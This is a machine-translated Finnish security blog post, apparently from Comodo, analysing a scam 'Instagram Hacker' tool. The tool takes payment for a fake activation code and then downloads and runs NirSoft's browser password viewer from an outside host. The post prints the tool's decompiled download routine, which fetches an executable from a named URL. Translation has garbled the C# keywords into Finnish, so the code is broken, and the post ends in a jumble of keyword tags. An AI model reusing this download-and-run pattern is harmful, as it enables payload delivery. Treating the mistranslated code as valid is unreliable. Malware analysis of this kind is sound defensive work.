Lukuaika: 4 pöytäkirja
Monet ihmiset eivät pidä mahdollisesti ei-toivottuja sovelluksia (PUA) vakavana vaarana. Syynä tällaiseen holtittomaan asenteeseen on se, että PUA:t asennetaan yleensä käyttäjän suostumuksella. Mutta tämä mielipide on suuri virhe. Eikä vain siksi, että PUA voi piilossa asentaa muita ohjelmia, kuten mainos- tai vakoiluohjelmia, latausvaiheessa. Elävä esimerkki Comodo Threat Research Labsin analysoima alla asiantuntijat osoittavat selvästi, että PUA voi olla paljon uhkaavampi ase.
Tutustu ohjelmistoon nimeltä "Instagram Hacker". Sillä on virallinen verkkosivusto https://hackinstagram.net/ ja lupaa… hakkeroida minkä tahansa Instagram-tilin. Lisäksi voit ladata ja asentaa sen ilmaiseksi.
Asennuksen jälkeen se kehottaa antamaan Instagram-profiilin URL-osoitteen ja murtamaan salasanan.
Tulos tulee muutamassa sekunnissa:
Mutta kun olet napsauttanut "Näytä salasana" -painiketta, uusi ikkuna tulee näkyviin:
Napsauttamalla "Hae aktivointikoodi" -painiketta ohjataan "Osta-sivulle".
Se tarjoaa "Aktivointikoodin" ostamisen, mutta … voitko haistaa petoksen ilmassa? On selvää, että ohjelmistoa, joka pystyy murtamaan Instagram-salasanan sekunneiksi, ei voi olla olemassa. Onko Instagram-hakkeri siis vain yksi huijaustyökalu yksinkertaisten huijaamiseen? Paras tapa tarkistaa se on tarkastella sovelluskoodia.
Koodi on suojattu Dotnet Reactorilla, mutta se voidaan purkaa de4dot-työkalulla.
Ja nyt voimme nähdä varmasti, että sovellus on petostyökalu. Ensimmäinen koodinpätkä vain väärentää edistymisen esittelyindikaattoria.
Mutta toinen on mielenkiintoisempi. Kuten näet, se sisältää URL-osoitteen, jossa on suoritettava tiedosto ladattavaksi, jos aktivointi onnistui.
Latausikkuna()
{
Class2.qDiUy7EzyuIMj();
this.filename = "view.exe";
this.uri = uusi Uri("http://software-logistics.net/external/component/download/view.exe");
this.InitializeComponent();
if (Tiedosto.Olemassa(this.filename))
{
Tiedosto.Poista(tämä.tiedostonnimi);
}
yrittää
{
WebClient client1 = uusi WebClient();
client1.DownloadFileAsync(this.uri, this.filename);
client1.DownloadProgressChanged += uusi DownloadProgressChangedEventHandler(this.method_1);
client1.DownloadFileCompleted += uusi AsyncCompletedEventHandler(this.method_2);
}
saalis
{
this.method_0();
}
}
}
}
Jos suoritamme suoritustiedoston, huomaamme, että se on NirSoftin WebBrowserPassView-sovellus:
https://www.nirsoft.net/utils/web_browser_password.html
WebBrowserPassView on vain salasanan purkutyökalu, joka paljastaa verkkoselaimien tallentamat salasanat. Joten kaikki salasanat, jotka tämä ohjelmisto voi poimia, eivät ole Instagramin vaan käyttäjien omia salasanoja, joita säilytetään heidän selaimissaan!
Jatketaan: kaikki, mitä Instagram Hacker tekee, on ladata ja käynnistää toinen PUA NirSoftista. Meillä on siis ilmeisesti edessämme petostyökalu. Huomaa tässä manipuloiva psykologinen temppu: jos uhri huomaa olevansa huijattu, hän tuskin ilmoittaa tapauksesta poliisille. Koska siinä tapauksessa hänen täytyisi tunnustaa yrittäessään hakkeroida Instagramia, se on tietoverkkorikollinen teko.
Mutta se on reunan ohut pää.
Vaarallisin uhka on, että sovelluksen URL-osoite voidaan helposti muuttaa missä tahansa muussa haitallisella tiedostolla, joka suoritetaan uhrin koneella. Joten tätä PUA:ta – kuten monia muitakin esimerkkejä sellaisista haittaohjelmista – voidaan käyttää erilaisten "raskaiden" haittaohjelmien, kuten troijalaisten, takaovien, ransomware ja niin edelleen
Ja tämä on hyvä syy pitää PUA todella vaarallisena haittaohjelmana. Koska se voi osoittautua ponnahduslautaksi tuhoiselle massiiviselle kyberhyökkäykselle.
"Tänään meidän ei pitäisi harkita haittaohjelmat vaarallisena tai ei niin vaarallisena", sanoo Fatih Orhan, Comodo Threat Research Labsin johtaja. "Minkä tahansa haittaohjelmat ei ole olemassa eristetyssä tilassa. Nykyään kyberrikolliset rakentavat pitkiä haittaohjelmaketjuja hyökätäkseen käyttäjiin, ja kuten näet, PUA voi olla lenkki tällaisessa tappamisketjussa. Joten meidän pitäisi kutsua asioita oikeilla osilla. Kyllä, nämä sovellukset ladataan ja suoritetaan käyttäjien luvalla, mutta kuten tässä tapauksessa, hyväksyntä kiristetään petoksella. Kaikkialla mahdollisesti ei-toivotut sovellukset teeskentelevät olevansa laillisia, ja kaikkien on ymmärrettävä, että se on vain naamiointia. Siksi Comodo ei ainoastaan tarjoa huippuluokan teknistä suojausta, vaan myös tiedottaa käyttäjille säännöllisesti, jotta he estävät heitä vaarallisilta ansoilta kyberavaruudessa.
Elää turvallisesti Comodon kanssa!
Aiheeseen liittyvät resurssit
Wikipedia DDOS-hyökkäys
Haittaohjelmien poisto
Verkkosivun haittaohjelmien skanneri
Paras verkkosivustojen suojaus
WordPress turvallisuus
TESTAA SÄHKÖPOSTI TURVALLISUUS SAA VAKAA TURVALLISUUSKORTTI ILMAISEKSI Lähde: https://blog.comodo.com/comodo-news/how-unwanted-applications-are-greater-security-threat/
- Tili
- Kaikki
- Hakemus
- sovellukset
- PARAS
- Uutiset ja media
- rakentaa
- Ostetaan
- soittaa
- koodi
- suostumus
- Kyberhyökkäys
- tietoverkkorikollisuuden
- verkkorikollisille
- DDoS
- reuna
- jne.
- tapahtuma
- asiantuntijat
- uuttaminen
- Kasvot
- Etunimi
- petos
- Ilmainen
- hyvä
- hakata
- hakkeri
- pää
- tätä
- Miten
- Miten
- HTTPS
- IT
- Labs
- LINK
- Pitkät
- haittaohjelmat
- Tarjoukset
- virallinen
- Lausunto
- Muut
- Salasana
- salasanat
- Ihmiset
- Valvoa
- Profiili
- Ohjelmat
- suojaus
- Raportit
- tutkimus
- ajaa
- turvallisuus
- Haju
- So
- Tuotteemme
- Tila
- onnistunut
- Tekninen
- aika
- URI
- Käyttäjät
- Näytä
- verkko
- Web-selaimet
- Verkkosivu